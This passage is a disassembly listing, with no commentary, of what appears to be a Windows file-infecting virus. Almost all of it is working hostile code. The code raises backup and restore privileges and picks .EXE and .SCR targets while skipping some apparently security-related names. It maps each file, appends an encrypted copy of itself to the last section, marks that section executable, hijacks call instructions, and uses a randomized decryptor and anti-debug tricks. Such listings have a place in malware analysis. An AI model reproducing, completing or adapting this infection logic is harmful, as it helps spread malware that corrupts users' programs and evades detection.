		cmp	dword ptr [ebp+1042E4h], 0
		jnz	short loc_31439FA9
		cmp	eax, [edi+0Ch]
		jnb	loc_3143A0C2
		jmp	short loc_31439FB5
; ---------------------------------------------------------------------------


loc_31439FA9:				; CODE XREF: sub_3143A09A-FEj
		cmp	[ebp+1042E4h], edx
		jnz	loc_3143A0C2


loc_31439FB5:				; CODE XREF: sub_3143A09A-F3j
		add	eax, [ebp+1042A4h]
		cmp	word ptr [eax],	25FFh
		jnz	loc_3143A0C2
		mov	eax, [eax+2]
		sub	eax, [ebx+34h]
		push	eax
		call	sub_31439404
		cmp	[ebp+1042E4h], edi
		jnz	loc_3143A0C2
		add	eax, [ebp+1042E8h]
		add	eax, [ebp+1042A4h]
		mov	eax, [eax]
		sub	eax, [edi+0Ch]
		jb	loc_3143A0C2
		cmp	eax, [edi+8]
		jnb	loc_3143A0C2


loc_31439FFE:				; CODE XREF: sub_3143A09A+22j
		add	eax, 2
		add	eax, [edi+14h]
		add	eax, [ebp+1042A4h]
		push	edx
		push	eax
		push	dword ptr [ebp+104304h]
		call	dword ptr [ebp+103E5Eh]
		pop	edx
		test	eax, eax
		jnz	loc_3143A0D8
		jmp	loc_3143A0C2
; ---------------------------------------------------------------------------


loc_3143A026:				; CODE XREF: sub_3143A09A-11Cj
		cmp	al, 0FFh
		jnz	loc_3143A0C2
		cmp	byte ptr [esi],	15h
		jnz	loc_3143A0C2
		mov	eax, [esi+1]
		sub	eax, [ebx+34h]
		push	eax
		call	sub_31439404
		cmp	[ebp+1042E4h], edi
		jnz	short loc_3143A0C2
		add	eax, [ebp+1042E8h]
		add	eax, [ebp+1042A4h]
		mov	[ebp+104310h], eax
		mov	eax, [eax]
		cmp	eax, [ebp+104308h]
		jb	short loc_3143A06F
		cmp	eax, [ebp+10430Ch]
		jb	short loc_3143A0D8


loc_3143A06F:				; CODE XREF: sub_3143A09A-35j
		cmp	eax, 70000000h
		jb	short loc_3143A0AD
		call	sub_3143A09A
		lea	ecx, [esi-4]
		mov	eax, ecx
		sub	eax, [edx]
		add	eax, [edx+10h]
		cmp	eax, [ebp+104310h]
		jnz	short locret_3143A099
		add	esp, 10h
		push	dword ptr [ecx]
		pop	[esp-0Ch+arg_24]
		popa
		jmp	short loc_3143A0B4
; ---------------------------------------------------------------------------

locret_3143A099:			; CODE XREF: sub_3143A09A-Fj
		retn
; END OF FUNCTION CHUNK	FOR sub_3143A09A

; =============== S U B	R O U T	I N E =======================================



sub_3143A09A	proc near		; CODE XREF: sub_3143A09A-24p

var_8		= dword	ptr -8
arg_0		= dword	ptr  4
arg_24		= dword	ptr  28h

; FUNCTION CHUNK AT 31439F7B SIZE 0000011F BYTES

		pop	dword ptr [ebp+1042C4h]
		pusha
		mov	esi, [ebp+1042A4h]
		call	sub_3143950B
		popa


loc_3143A0AD:				; CODE XREF: sub_3143A09A-26j
		test	eax, 80000000h
		jnz	short loc_3143A0C2


loc_3143A0B4:				; CODE XREF: sub_3143A09A-3j
		sub	eax, [edi+0Ch]
		jb	short loc_3143A0C2
		cmp	eax, [edi+8]
		jb	loc_31439FFE


loc_3143A0C2:				; CODE XREF: sub_3143A09A-F9j
					; sub_3143A09A-EBj ...
		dec	ecx
		jnz	loc_31439F7B


loc_3143A0C9:				; CODE XREF: sub_31439EE1+9j
					; UPX2:31439F63j ...
		mov	edi, [esp-4+arg_0]
		and	dword ptr [edi+29B0h], 0FFBFFFFFh
		jmp	short loc_3143A11A
; ---------------------------------------------------------------------------


loc_3143A0D8:				; CODE XREF: sub_3143A09A-7Fj
					; sub_3143A09A-2Dj
		or	dword ptr [edx+24h], 0E0000060h
		dec	esi
		xor	eax, eax
		mov	ecx, [esp+8+var_8]
		xchg	eax, [ebp+1042F0h]
		mov	[ebp+1042ECh], eax
		lea	edi, [ecx+29B4h]
		add	eax, [ebp+1042A4h]
		movsw
		movsd
		dec	esi
		sub	eax, esi
		add	eax, [edx+14h]
		sub	eax, [edx+0Ch]
		mov	byte ptr [esi-5], 0E8h
		mov	dword ptr [ecx+54h], 5
		mov	[esi-4], eax


loc_3143A11A:				; CODE XREF: sub_3143A09A+3Cj
		pop	edi
		pop	esi
		retn
sub_3143A09A	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_3143A11D	proc near		; CODE XREF: UPX2:3143A41Ep

; FUNCTION CHUNK AT 3143A247 SIZE 00000002 BYTES

		push	edi
		call	dword ptr [ebp+103EAAh]
		shr	eax, 1Fh
		jnz	loc_3143A247
		push	eax
		push	esp
		push	28h
		push	0FFFFFFFFh
		call	dword ptr [ebp+103F0Ah]
		test	eax, eax
		pop	edi
		js	loc_3143A247
		call	sub_3143859F
		call	near ptr loc_3143A158+5
		push	ebx
		db	65h
		jz	short near ptr unk_3143A196
		imul	ebp, [ebp+53h],	72756365h


loc_3143A158:				; CODE XREF: sub_3143A11D+2Ap
		imul	esi, [ecx+edi*2+41h], 78B5FF00h
sub_3143A11D	endp ; sp-analysis failed

		inc	edx
		adc	[eax], al
		call	dword ptr [ebp+103E5Eh]
		mov	[ebp+104280h], eax
		call	near ptr loc_3143A18C+1
		push	ebx
		db	65h
		push	esp
		popa
		imul	esp, [ebp+4Fh],	77h
		outsb
		db	65h
		jb	short loc_3143A1F3
		push	72507069h
		imul	esi, [esi+69h],	6567656Ch


loc_3143A18C:				; CODE XREF: UPX2:3143A16Fp
		add	[edi-18h], dl
		sub	eax, ebp
; ---------------------------------------------------------------------------
		db 0FFh
		db 0FFh
		db 0E8h	; 
		db  13h
		db    0
unk_3143A196	db    0			; CODE XREF: sub_3143A11D+30j
		db    0
		db  53h	; S
		db  65h	; e
		db  52h	; R
		db  65h	; e
		db  73h	; s
		db  74h	; t
		db  6Fh	; o
		db  72h	; r
		db  65h	; e
		db  50h	; P
		db  72h	; r
		db  69h	; i
		db  76h	; v
		db  69h	; i
		db  6Ch	; l
		db  65h	; e
		db  67h	; g
		db  65h	; e
		db    0
		db  57h	; W
		db 0E8h	; 
		db  0Bh
		db 0E8h	; 
		db 0FFh
		db 0FFh
		db 0E8h	; 
		db  12h
		db    0
		db    0
		db    0
		db  53h	; S
		db  65h	; e
		db  42h	; B
		db  61h	; a
		db  63h	; c
		db  6Bh	; k
		db  75h	; u
		db  70h	; p
		db  50h	; P
		db  72h	; r
		db  69h	; i
		db  76h	; v
		db  69h	; i
		db  6Ch	; l
		db  65h	; e
		db  67h	; g
		db  65h	; e
		db    0
		db  57h	; W
		db 0E8h	; 
		db 0EEh	; 
		db 0E7h	; 
		db 0FFh
		db 0FFh
		db 0E8h	; 
		db  18h
		db    0
		db    0
		db    0
		db  53h	; S
		db  65h	; e
		db  43h	; C
		db  68h	; h
		db  61h	; a
		db  6Eh	; n
		db  67h	; g
		db  65h	; e
		db  4Eh	; N
		db  6Fh	; o
		db  74h	; t
		db  69h	; i
		db  66h	; f
		db  79h	; y
		db  50h	; P
		db  72h	; r
		db  69h	; i
		db  76h	; v
		db  69h	; i
		db  6Ch	; l
		db  65h	; e
		db  67h	; g
		db  65h	; e
		db    0
		db  57h	; W
		db 0E8h	; 
		db 0CBh	; 
		db 0E7h	; 
		db 0FFh
		db 0FFh
		db  50h	; P
		db  54h	; T
; ---------------------------------------------------------------------------


loc_3143A1F3:				; CODE XREF: UPX2:3143A17Dj
		lea	eax, [ebp+103DBCh]
		push	64h
		push	eax
		push	1
		push	edi
		call	dword ptr [ebp+103F16h]
		mov	[esp], edi
		call	dword ptr [ebp+103E52h]
		sub	al, al
		lea	edi, [ebp+104174h]
		push	eax
		push	eax
		push	eax
		push	dword ptr [ebp+103DBCh]
		push	40001h
		push	esp
		push	1
		push	edi
		call	dword ptr [ebp+104280h]
		push	esp
		push	4
		push	edi
		call	dword ptr [ebp+104280h]
		add	esp, 14h
		push	dword ptr [ebp+104278h]
		call	dword ptr [ebp+103E8Eh]
; START	OF FUNCTION CHUNK FOR sub_3143A11D


loc_3143A247:				; CODE XREF: sub_3143A11D+Aj
					; sub_3143A11D+1Fj
		pop	edi
		retn
; END OF FUNCTION CHUNK	FOR sub_3143A11D

; =============== S U B	R O U T	I N E =======================================



sub_3143A249	proc near		; CODE XREF: UPX2:3143A417p
					; UPX2:3143A423p ...
		lea	esi, [ebp+104174h]
		push	esi
		call	dword ptr [ebp+103E92h]
		cmp	eax, 0FFFFFFFFh
		jz	locret_3143A31A
		mov	[ebp+104284h], eax
		push	0
		push	esi
		call	dword ptr [ebp+103ECEh]
		test	eax, eax
		jz	locret_3143A31A
		sub	eax, eax
		push	eax
		push	eax
		push	3
		push	eax
		push	1
		push	0C0000000h
		push	esi
		call	dword ptr [ebp+103E6Eh]
		cmp	eax, 0FFFFFFFFh
		jz	loc_3143A89B
		mov	[ebp+104288h], eax
		lea	ecx, [ebp+10428Ch]
		lea	edx, [ebp+104294h]
		push	ecx
		push	edx
		push	0
		push	eax
		call	dword ptr [ebp+103E9Ah]
		cmp	eax, 0FFFFFFFFh
		jz	loc_3143A88F
		push	0
		push	dword ptr [ebp+104288h]
		call	dword ptr [ebp+103E96h]
		cmp	eax, 0FFFFFFFFh
		jz	loc_3143A88F
		mov	[ebp+10429Ch], eax
		xor	ecx, ecx
		add	eax, ebx
		push	ecx
		push	eax
		push	ecx
		push	4
		push	ecx
		push	dword ptr [ebp+104288h]
		call	dword ptr [ebp+103E72h]
		test	eax, eax
		jz	loc_3143A88F
		xor	ecx, ecx
		mov	[ebp+1042A0h], eax
		push	ecx
		push	ecx
		push	ecx
		push	0F001Fh
		push	eax
		call	dword ptr [ebp+103EBAh]
		test	eax, eax
		jz	loc_3143A867
		mov	[ebp+1042A4h], eax

locret_3143A31A:			; CODE XREF: sub_3143A249+10j
					; sub_3143A249+27j ...
		retn
sub_3143A249	endp

; ---------------------------------------------------------------------------


loc_3143A31B:				; CODE XREF: sub_3143A44B+188p
					; sub_3143A44B+2A0p
		mov	eax, 7317h
		mov	ecx, [ebx+38h]
; ---------------------------------------------------------------------------
		db 0F7h	; 
		db  85h	; 
		db 0B0h	; 
		db  39h	; 9
		db  10h
		db    0
		db    0
		db    0
		db    0
; ---------------------------------------------------------------------------
		and	[ebp+6], dh
		add	eax, [ebp+101069h]
		xor	edx, edx
		add	eax, ecx
		div	ecx
		mul	ecx
		mov	[ebp+1042B0h], eax
		mov	eax, 29BBh
		mov	ecx, [ebx+3Ch]
		add	eax, [ebp+101069h]
		xor	edx, edx
		add	eax, ecx
		div	ecx
		mul	ecx
		mov	[ebp+1042A8h], eax
		retn

; =============== S U B	R O U T	I N E =======================================



sub_3143A360	proc near		; CODE XREF: sub_3143A44B:loc_3143A4C0p
					; sub_3143A44B+1B4p
		movzx	ecx, word ptr [ebx+6]
		stc


loc_3143A365:				; CODE XREF: sub_3143A360+23j
		jecxz	short locret_3143A39C
		lea	edx, [ebx+18h]
		movzx	eax, word ptr [ebx+14h]
		add	edx, eax
		dec	ecx
		imul	eax, ecx, 28h
		add	edx, eax
		cmp	dword ptr [edx], 6E69775Fh
		stc
		jz	short locret_3143A39C
		cmp	dword ptr [edx+0Ch], 1
		jb	short loc_3143A365
		mov	ecx, [ebx+3Ch]
		mov	eax, [edx+14h]
		add	eax, [edx+10h]
		lea	eax, [eax+ecx*2-1]
		neg	ecx
		and	eax, ecx
		cmp	eax, [ebp+10429Ch]

locret_3143A39C:			; CODE XREF: sub_3143A360:loc_3143A365j
					; sub_3143A360+1Dj ...
		retn
sub_3143A360	endp


; =============== S U B	R O U T	I N E =======================================



sub_3143A39D	proc near		; CODE XREF: UPX2:3143A435p

arg_C		= dword	ptr  10h

		mov	edx, [esp+arg_C]
		xor	eax, eax
		pop	dword ptr [edx+0B8h]
		retn
sub_3143A39D	endp ; sp-analysis failed

; ---------------------------------------------------------------------------


loc_3143A3AA:				; CODE XREF: UPX2:3143A3CBj
		mov	ecx, edi
		jmp	short loc_3143A3B9
; ---------------------------------------------------------------------------
		lea	edi, [ebp+104174h]
		cld


loc_3143A3B5:				; CODE XREF: UPX2:3143A3C7j
		mov	ebx, edi
		xor	ecx, ecx


loc_3143A3B9:				; CODE XREF: UPX2:3143A3ACj
					; UPX2:3143A3CFj
		lodsb
		cmp	al, 61h
		jb	short loc_3143A3C4
		cmp	al, 7Ah
		ja	short loc_3143A3C4
		sub	al, 20h


loc_3143A3C4:				; CODE XREF: UPX2:3143A3BCj
					; UPX2:3143A3C0j
		stosb
		cmp	al, 5Ch
		jz	short loc_3143A3B5
		cmp	al, 2Eh
		jz	short loc_3143A3AA
		cmp	al, 0
		jnz	short loc_3143A3B9
		jecxz	short locret_3143A39C
		mov	eax, [ecx]
		cmp	eax, 455845h
		jz	short loc_3143A3E7
		cmp	eax, 524353h
		jnz	locret_3143A31A


loc_3143A3E7:				; CODE XREF: UPX2:3143A3DAj
		mov	eax, [ebx]
		cmp	eax, 434E4957h
		jz	locret_3143A31A
		cmp	eax, 4E554357h
		jz	locret_3143A31A
		cmp	eax, 32334357h
		jz	locret_3143A31A
		cmp	eax, 4F545350h
		jz	locret_3143A31A
		xor	ebx, ebx
		call	sub_3143A249
		jnz	short loc_3143A42E
		call	sub_3143A11D
		call	sub_3143A249
		jz	locret_3143A31A


loc_3143A42E:				; CODE XREF: UPX2:3143A41Cj
		xor	edx, edx
		call	sub_3143A44B
		call	sub_3143A39D
		call	$+5
		pop	ebp
		sub	ebp, 10343Fh
		jmp	loc_3143A845

; =============== S U B	R O U T	I N E =======================================



sub_3143A44B	proc near		; CODE XREF: UPX2:3143A430p

var_14		= dword	ptr -14h

		push	dword ptr fs:[edx]
		mov	esi, [ebp+1042A4h]
		mov	fs:[edx], esp
		cmp	word ptr [esi],	5A4Dh
		jnz	loc_3143A845
		mov	ebx, [esi+3Ch]
		add	ebx, esi
		cmp	word ptr [ebx],	4550h
		jnz	loc_3143A845
		test	dword ptr [ebx+16h], 2000h
		jnz	loc_3143A845
		test	byte ptr [ebx+5Ch], 2
		jz	loc_3143A845
		mov	eax, [ebx+8]
		cmp	eax, 0A0A0A0A0h
		jz	loc_3143A845
		cmp	eax, 20202020h
		jz	loc_3143A845
		mov	ecx, [ebx+0C8h]
		jecxz	short loc_3143A4C0
		push	ecx
		call	sub_31439404
		add	ecx, [ebp+1042E8h]
		add	ecx, esi
		and	dword ptr [ecx+40h], 0
		and	dword ptr [ecx+44h], 0


loc_3143A4C0:				; CODE XREF: sub_3143A44B+5Dj
		call	sub_3143A360
		jb	loc_3143A845
		and	dword ptr [ebp+1042ECh], 0
		mov	eax, [edx+8]
		mov	ecx, [edx+10h]
		sub	eax, ecx
		jnb	short loc_3143A4E0
		xor	eax, eax
		jmp	short loc_3143A4E5
; ---------------------------------------------------------------------------


loc_3143A4E0:				; CODE XREF: sub_3143A44B+8Fj
		add	ecx, eax
		mov	[edx+10h], ecx


loc_3143A4E5:				; CODE XREF: sub_3143A44B+93j
		mov	[ebp+1042ACh], eax
		add	ecx, [edx+0Ch]
		mov	eax, 10000h
		push	ecx
		call	near ptr dword_31438B40+43h
		xor	[ebp+1039AEh], dl
		mov	cl, 20h
		xor	[ebp+1039AFh], dh


loc_3143A507:				; CODE XREF: sub_3143A44B+D5j
		push	20h
		dec	cl
		pop	eax
		js	short loc_3143A522
		call	near ptr dword_31438B40+43h
		test	edx, edx
		setz	dl
		shl	edx, cl
		xor	[ebp+1039B0h], edx
		jmp	short loc_3143A507
; ---------------------------------------------------------------------------


loc_3143A522:				; CODE XREF: sub_3143A44B+C1j
		test	dword ptr [ebp+1039B0h], 2000000h
		jz	short loc_3143A550
		test	dword ptr [ebp+1039B0h], 3
		jnz	short loc_3143A546
		and	dword ptr [ebp+1039B0h], 0F7FFFFFFh
		jmp	short loc_3143A550
; ---------------------------------------------------------------------------


loc_3143A546:				; CODE XREF: sub_3143A44B+EDj
		or	dword ptr [ebp+1039B0h], 10000000h


loc_3143A550:				; CODE XREF: sub_3143A44B+E1j
					; sub_3143A44B+F9j ...
		push	6
		pop	ecx


loc_3143A556:				; CODE XREF: sub_3143A44B+129j
		push	6
		pop	eax
		call	near ptr dword_31438B40+43h
		mov	al, [ebp+1039A8h]
		xchg	al, [edx+ebp+1039A8h]
		mov	[ebp+1039A8h], al
		loop	loc_3143A556
		test	dword ptr [ebp+1039B0h], 8
		jnz	short loc_3143A58B
		cmp	byte ptr [ebp+1039AAh],	1
		jz	short loc_3143A550


loc_3143A58B:				; CODE XREF: sub_3143A44B+135j
		test	dword ptr [ebp+1039B0h], 10000000h
		jz	short loc_3143A5B2
		cmp	byte ptr [ebp+1039A8h],	5
		jz	short loc_3143A550
		cmp	byte ptr [ebp+1039A9h],	5
		jz	short loc_3143A550
		cmp	byte ptr [ebp+1039AAh],	5
		jz	short loc_3143A550


loc_3143A5B2:				; CODE XREF: sub_3143A44B+14Aj
		test	dword ptr [ebp+1039B0h], 400000h
		jz	short loc_3143A5C7
		cmp	byte ptr [ebp+1039A8h],	2
		ja	short loc_3143A550


loc_3143A5C7:				; CODE XREF: sub_3143A44B+171j
		and	dword ptr [ebp+1042F0h], 0
		call	loc_31439845
		call	loc_3143A31B
		call	sub_3143A84E
		mov	ebx, [ebp+1042A8h]
		add	ebx, [ebp+1042ACh]
		call	sub_3143A249
		jz	loc_3143A845
		mov	esi, [ebp+1042A4h]
		mov	ebx, [esi+3Ch]
		add	ebx, esi
		call	sub_3143A360
		jb	loc_3143A845
		or	dword ptr [edx+24h], 0E0000060h
		mov	edi, esi
		push	edx
		push	esi
		add	edi, [edx+14h]
		add	edi, [edx+10h]
		test	dword ptr [ebp+1039B0h], 20000000h
		jnz	short loc_3143A63B
		mov	[ebp+1042F4h], edi
		lea	esi, [ebp+1039BCh]
		mov	ecx, [ebp+101069h]
		rep movsb


loc_3143A63B:				; CODE XREF: sub_3143A44B+1DAj
		push	edi
		mov	ecx, 0A6Fh
		lea	esi, [ebp+101000h]
		rep movsd
		mov	cl, 0
		jecxz	short loc_3143A64F
		rep movsb


loc_3143A64F:				; CODE XREF: sub_3143A44B+200j
		test	dword ptr [ebp+1039B0h], 20000000h
		jz	loc_3143A70D
		push	dword ptr [ebx+28h]
		call	sub_31439404
		mov	edx, [ebp+1042E4h]
		test	edx, edx
		jz	loc_3143A70D
		mov	esi, [ebp+1042A4h]
		mov	ecx, [edx+10h]
		or	dword ptr [edx+24h], 0E0000060h
		sub	ecx, [edx+8]
		jnb	short loc_3143A68C
		xor	ecx, ecx


loc_3143A68C:				; CODE XREF: sub_3143A44B+23Dj
		add	esi, [edx+14h]
		cmp	ecx, [ebp+101069h]
		mov	ecx, [ebp+101069h]
		jb	short loc_3143A6F3
		mov	edi, [esp+14h+var_14]
		and	dword ptr [ebp+101069h], 0
		and	dword ptr [edi+69h], 0
		mov	edi, [edx+8]
		add	[edx+8], ecx
		add	esi, edi
		xchg	esi, edi
		mov	eax, [ebp+1042B8h]
		test	dword ptr [ebp+1039B0h], 40h
		jz	short loc_3143A6CC
		neg	dword ptr [eax]


loc_3143A6CC:				; CODE XREF: sub_3143A44B+27Dj
		add	esi, [edx+0Ch]
		sub	[eax], esi
		mov	[ebp+1042F0h], esi
		mov	esi, [ebx+28h]
		add	[eax], esi
		test	dword ptr [ebp+1039B0h], 40h
		jz	short loc_3143A6EA
		neg	dword ptr [eax]


loc_3143A6EA:				; CODE XREF: sub_3143A44B+29Bj
		push	ecx
		call	loc_3143A31B
		pop	ecx
		jmp	short loc_3143A6FF
; ---------------------------------------------------------------------------


loc_3143A6F3:				; CODE XREF: sub_3143A44B+250j
		add	esi, [ebx+28h]
		sub	esi, [edx+0Ch]
		push	ecx
		push	esi
		rep movsb
		pop	edi
		pop	ecx


loc_3143A6FF:				; CODE XREF: sub_3143A44B+2A6j
		lea	esi, [ebp+1039BCh]
		mov	[ebp+1042F4h], edi
		rep movsb


loc_3143A70D:				; CODE XREF: sub_3143A44B+20Ej
					; sub_3143A44B+224j
		pop	edi
		pop	esi
		rdtsc
		xchg	eax, edx
		lea	eax, [edi+137h]
		cmp	dl, [ebp+1039AEh]
		jnz	short loc_3143A726
		imul	edx, 12345678h


loc_3143A726:				; CODE XREF: sub_3143A44B+2D3j
		mov	[eax-19h], dx
		call	near ptr loc_3143811E+2
		pop	edx
		mov	ecx, [edx+0Ch]
		add	ecx, [edx+10h]
		test	dword ptr [ebp+1039B0h], 20000000h
		lea	eax, [ecx+5]
		jnz	short loc_3143A758
		mov	[ebp+1042F0h], ecx
		add	eax, [ebp+101069h]
		and	dword ptr [edi+69h], 0


loc_3143A758:				; CODE XREF: sub_3143A44B+2F8j
		sub	eax, [ebx+28h]
		mov	[edi+54h], eax
		test	dword ptr [ebp+103F6Ch], 1
		jz	short loc_3143A774
		mov	dword ptr [ebx+8], 0A0A0A0A0h


loc_3143A774:				; CODE XREF: sub_3143A44B+320j
		test	dword ptr [ebp+1039B0h], 400000h
		jz	short loc_3143A787
		push	edx
		call	sub_31439EE1
		pop	edx


loc_3143A787:				; CODE XREF: sub_3143A44B+333j
		mov	ecx, [ebp+1042F0h]
		jecxz	short loc_3143A794
		mov	[ebx+28h], ecx
		jmp	short loc_3143A7A1
; ---------------------------------------------------------------------------


loc_3143A794:				; CODE XREF: sub_3143A44B+342j
		mov	ecx, [ebp+1042ECh]
		jecxz	short loc_3143A79E
		jmp	short loc_3143A7A1
; ---------------------------------------------------------------------------


loc_3143A79E:				; CODE XREF: sub_3143A44B+34Fj
		mov	ecx, [ebx+28h]


loc_3143A7A1:				; CODE XREF: sub_3143A44B+347j
					; sub_3143A44B+351j
		test	dword ptr [ebp+1039B0h], 3
		jz	short loc_3143A7C1
		mov	eax, [ebp+1042F4h]
		add	ecx, [ebp+1042DCh]
		add	eax, [ebp+1042D8h]
		add	[eax], ecx


loc_3143A7C1:				; CODE XREF: sub_3143A44B+360j
		mov	ecx, [edx+10h]
		mov	eax, [ebp+1042A8h]
		cmp	[edx+8], ecx
		jnb	short loc_3143A7D2
		mov	[edx+8], ecx


loc_3143A7D2:				; CODE XREF: sub_3143A44B+382j
		add	[edx+10h], eax
		and	dword ptr [ebx+58h], 0
		mov	eax, [ebp+1042B0h]
		push	29BCh
		add	[edx+8], eax
		pop	ecx
		add	[ebx+50h], eax
		mov	dl, [ebp+1039AEh]
		test	dword ptr [ebp+1039B0h], 20000000h
		jz	short loc_3143A803
		add	ecx, [ebp+101069h]


loc_3143A803:				; CODE XREF: sub_3143A44B+3B0j
		mov	dh, 0
		test	dword ptr [ebp+1039B0h], 20000h
		jnz	short loc_3143A825
		inc	dh
		test	dword ptr [ebp+1039B0h], 40000h
		jnz	short loc_3143A825
		mov	dh, [ebp+1039AFh]


loc_3143A825:				; CODE XREF: sub_3143A44B+3C4j
					; sub_3143A44B+3D2j
		test	dword ptr [ebp+1039B0h], 4000h
		jnz	short loc_3143A83C


loc_3143A831:				; CODE XREF: sub_3143A44B+3EDj
		mov	al, [edi]
		add	al, dl
		stosb
		add	dl, dh
		loop	loc_3143A831
		jmp	short loc_3143A845
; ---------------------------------------------------------------------------


loc_3143A83C:				; CODE XREF: sub_3143A44B+3E4j
					; sub_3143A44B+3F8j
		mov	al, [edi]
		xor	al, dl
		stosb
		add	dl, dh
		loop	loc_3143A83C


loc_3143A845:				; CODE XREF: UPX2:3143A446j
					; sub_3143A44B+11j ...
		xor	edx, edx
		mov	esp, fs:[edx]
		pop	dword ptr fs:[edx]
		pop	eax
sub_3143A44B	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_3143A84E	proc near		; CODE XREF: sub_3143A44B+18Dp
		cmp	dword ptr [ebp+104288h], 0
		jz	locret_3143A31A
		push	dword ptr [ebp+1042A4h]
		call	dword ptr [ebp+103EDEh]


loc_3143A867:				; CODE XREF: sub_3143A249+C5j
		push	dword ptr [ebp+1042A0h]
		call	dword ptr [ebp+103E52h]
		lea	ecx, [ebp+10428Ch]
		lea	edx, [ebp+104294h]
		push	ecx
		push	edx
		push	0
		push	dword ptr [ebp+104288h]
		call	dword ptr [ebp+103ED2h]


loc_3143A88F:				; CODE XREF: sub_3143A249+6Bj
					; sub_3143A249+82j ...
		push	dword ptr [ebp+104288h]
		call	dword ptr [ebp+103E52h]


loc_3143A89B:				; CODE XREF: sub_3143A249+45j
		lea	esi, [ebp+104174h]
		push	dword ptr [ebp+104284h]
		push	esi
		call	dword ptr [ebp+103ECEh]
		and	dword ptr [ebp+104288h], 0
		retn
sub_3143A84E	endp

; ---------------------------------------------------------------------------
		dw 0E8h
		dd 5D000000h, 0ED81016Ah, 1038BBh, 0C10FF058h, 10157885h
		dd 0C3C08500h, 0F0FFC883h, 7885C10Fh, 0C3001015h, 2A00103Dh
		dd 661C7500h, 0C247C81h, 1375716Ch, 0FFC4E860h,	575FFFFh
		dd 0FFFAB5E8h, 0FFD2E8FFh, 2E61FFFFh, 56782DFFh, 25B81234h
		dd 60000000h, 0FFFFA5E8h, 8B3975FFh, 8D302444h,	104174B5h
		dd 8508B00h, 63A8166h, 56257302h, 0FF000068h, 6AC48B00h
		dd 0FF505200h, 103F1E95h, 8C48300h, 3F5C3E81h, 3755C3Fh
		dd 0E804C683h, 0FFFFFA62h, 0FFFF7FE8h, 0B8C361FFh, 74h
		dd 2FB8B1EBh, 0E8000000h, 1Dh, 0B80020C2h, 30h,	10E8h
		dd 24C200h, 185B8h, 3E800h, 2CC20000h, 24548D00h, 832ECD0Ch
		dd 197C00F8h, 0E860h, 548B0000h, 8B5D3024h, 92ED811Ah
		dd 0E8001039h, 0FFFFE0B3h, 4C261h, 3070602h, 9E40501h
		dd 0F62F541Ch, 119415FFh, 0FF8B0100h
; ---------------------------------------------------------------------------
		push	ebp
		mov	ebp, esp
		call	sub_3143A9CF
		xchg	ebx, ebx
		xchg	ebx, ebx
		call	sub_3143AA56
		mov	ecx, ecx

; =============== S U B	R O U T	I N E =======================================



sub_3143A9CF	proc near		; CODE XREF: UPX2:3143A9BFp
		push	dword ptr fs:0
		mov	fs:0, esp
		mov	eax, eax
		sub	eax, eax


loc_3143A9DF:				; CODE XREF: sub_3143A9CF+16j
		dec	al
		or	al, al
		jz	short loc_3143A9E9
		jnz	short loc_3143A9DF
		jmp	short loc_3143AA50
; ---------------------------------------------------------------------------


loc_3143A9E9:				; CODE XREF: sub_3143A9CF+14j
		cmc
		clc
		mov	ebx, ebx
		nop
		nop
		cld
		mov	ecx, ecx
		call	sub_3143AA4E
		xchg	ebx, ebx
		stc
		add	esi, 5FC5h
		mov	edx, 2A66h
		jmp	short $+2
		and	ecx, 0
		or	ecx, 0E6h
		clc
		stc
		push	esi
		nop


loc_3143AA14:				; CODE XREF: sub_3143A9CF+53j
		call	sub_3143AA3F
		add	esi, 1
		dec	edx
		cmc
		cmc
		cmp	edx, 0
		jnz	short loc_3143AA14
		pop	esi
		nop
		mov	ecx, [ebp-8]
		mov	fs:0, ecx
		clc
		jmp	short $+2
		leave
		clc
		mov	ebx, ebx
		jmp	esi
sub_3143A9CF	endp

; ---------------------------------------------------------------------------
		jmp	short $+2
		mov	edx, edx
		mov	ecx, ecx
		cmc

; =============== S U B	R O U T	I N E =======================================



sub_3143AA3F	proc near		; CODE XREF: sub_3143A9CF:loc_3143AA14p
		mov	al, [esi]
		mov	edx, edx
		xor	ax, cx
		clc
		xchg	al, [esi]
		retn
sub_3143AA3F	endp

; ---------------------------------------------------------------------------
		jmp	short $+2
		xchg	ebx, ebx

; =============== S U B	R O U T	I N E =======================================



sub_3143AA4E	proc near		; CODE XREF: sub_3143A9CF+23p
		pop	esi
		stc


loc_3143AA50:				; CODE XREF: sub_3143A9CF+18j
		jmp	short $+2
		jmp	esi
sub_3143AA4E	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		jmp	short $+2

; =============== S U B	R O U T	I N E =======================================



sub_3143AA56	proc near		; CODE XREF: UPX2:3143A9C8p

arg_C		= dword	ptr  10h

		mov	edx, [esp+arg_C]
		xor	eax, eax
		pop	dword ptr [edx+0B8h]
		retn
sub_3143AA56	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		db 0F5h
		dd 0E2BD90F5h, 48EFh, 0EDh dup(0)
aBasenamedobjec:
		unicode	0, <\BaseNamedObjects\VtSect>,0
		dw 9B47h
		dd 8AD7C80h, 3317C83h, 0ADA07C91h, 7C80h, 0
		dd 0BDB60000h, 1A247C80h, 945C7C80h, 23677C80h,	42C7C80h
		dd 6377C81h, 4B0F7C81h,	0C0587C86h, 0E7EC7C80h,	0ABDE7C80h
		dd 153C7C80h, 0A777C81h, 1C457C81h, 0B6A17C83h,	8FF7C80h
		dd 5DCA7C86h, 11DA7C83h, 2ADE7C81h, 1BA57C81h, 1D777C82h
		dd 0B9057C80h, 0BB767C80h, 9E17C80h, 3DE57C83h,	3F587C86h
		dd 27827C86h, 1CB87C81h, 24427C83h, 0B1C7C80h, 0B9747C81h
		dd 9A517C80h, 0D877C80h, 0D4607C81h, 0D6827C90h, 0D7547C90h
		dd 0D7697C90h, 0D7937C90h, 7C90h, 0DC550000h, 0DCFD7C90h
		dd 0DD907C90h, 0DDBA7C90h, 0DEB67C90h, 0E0457C90h, 0EA327C90h
		dd 30C67C90h, 7C91h, 14h dup(0)
		dd 320030h, 3143AF7Ch, 42005Ch,	730061h, 4E0065h, 6D0061h
		dd 640065h, 62004Fh, 65006Ah, 740063h, 5C0073h,	740056h
		dd 650053h, 740063h, 0D3h dup(0)
		dd 7FFDE000h, 1341h dup(0)
UPX2		ends

; Section 4. (virtual address 00020000)
; Virtual size			: 00001000 (   4096.)
; Section size in file		: 00000200 (	512.)
; Offset to raw	data for section: 00020000
; Flags	C0000040: Data Readable	Writable
; Alignment	: default
; ===========================================================================

; Segment type:	Pure data
; Segment permissions: Read/Write
_idata2		segment	para public 'DATA' use32
		assume cs:_idata2
		;org 31440000h
